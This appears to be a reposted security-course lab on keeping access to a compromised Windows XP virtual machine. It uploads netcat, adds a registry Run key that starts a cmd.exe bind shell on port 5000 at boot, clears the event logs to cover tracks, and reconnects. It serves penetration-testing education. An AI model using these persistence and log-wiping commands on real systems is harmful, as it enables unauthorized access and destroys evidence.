This activity is ungraded.
Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.
Backdoor DemoSystem: During this activity, you’ll continue to use Metasploit as shown in the first activity in this unit.
Software: In this activity you will use these applications and resources that are included in the Kali VM:
MetasploitMeterpreternetcat, the TCP/IP Swiss Army Knife that lets you read from and write to networking connections using TCP or UDPTime: This activity should take you approximately 30 minutes to complete.
Note: Hit Enter after each command.
Once you have exploited a system, you have to maintain that level of access as patches, firewalls, and other fixes are implemented. These changes to an exploited system may prevent you from using the same exploit at some point in the future. To maintain persistence, we will be using a tool called netcat, to create a backdoor.
In the Windows XP VM, click Start > Run, and enter msconfig.Examine the Startup tab. The Startup tab should not show any specific programs being launched automatically as the system boots.In the meterpreter prompt within the Kali VM, enter upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32.This command uploads the Windows version of netcat (nc.exe) to the compromised system.Note the use of double back slashes in the Windows path, representing an escape character and then the literal backslash characterEnter reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run to see what is set in the one of the Run keys in the registry on the Windows XP system. Values in this key represent programs that will run every time the system starts.Enter reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5000 -e cmd.exe'.This command writes a value, represented by –v, to the registry key we accessed in the previous step.
–d represents the data for the value. Specifically, it starts a netcat listener on port 5000 of the compromised system, so you can get back into the system with significantly less effort than before. This value will be loaded every time the Windows XP system boots.The upper case L option stands for: listen harder, re-listen on socket close.The d option stands for detach from console, background mode.The p option stands for local port number, which in this case, is 5000.The -e option specifies the inbound program to execute, cmd.exe.To check the key, value, and data, enter reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc.
Covering Your Tracks
Before testing the backdoor, pentesters and hackers want to cover their tracks, which is usually the last step in any attack.
In the Windows XP VM, right click on Start and select My Computer > Manage > System Tools > Event Viewer. Examine the information it contains for log entries.In Meterpreter, enter clearev. The log entries should disappear.From Meterpreter, reboot the Windows XP system with the reboot command.Close msfconsole and meterpreter.Open up a new terminal, and enter nc 192.168.1.105 5000 (using the IP of the Windows XP system). You should immediately be inside the Windows XP system.Go back to the Windows XP VM, and view the Startup tab of msconfig. You’ll see the netcat backdoor in the Startup tab.After you've finished, answer the Check Your Work questions.
转载于:https://www.cnblogs.com/sec875/articles/10028583.html
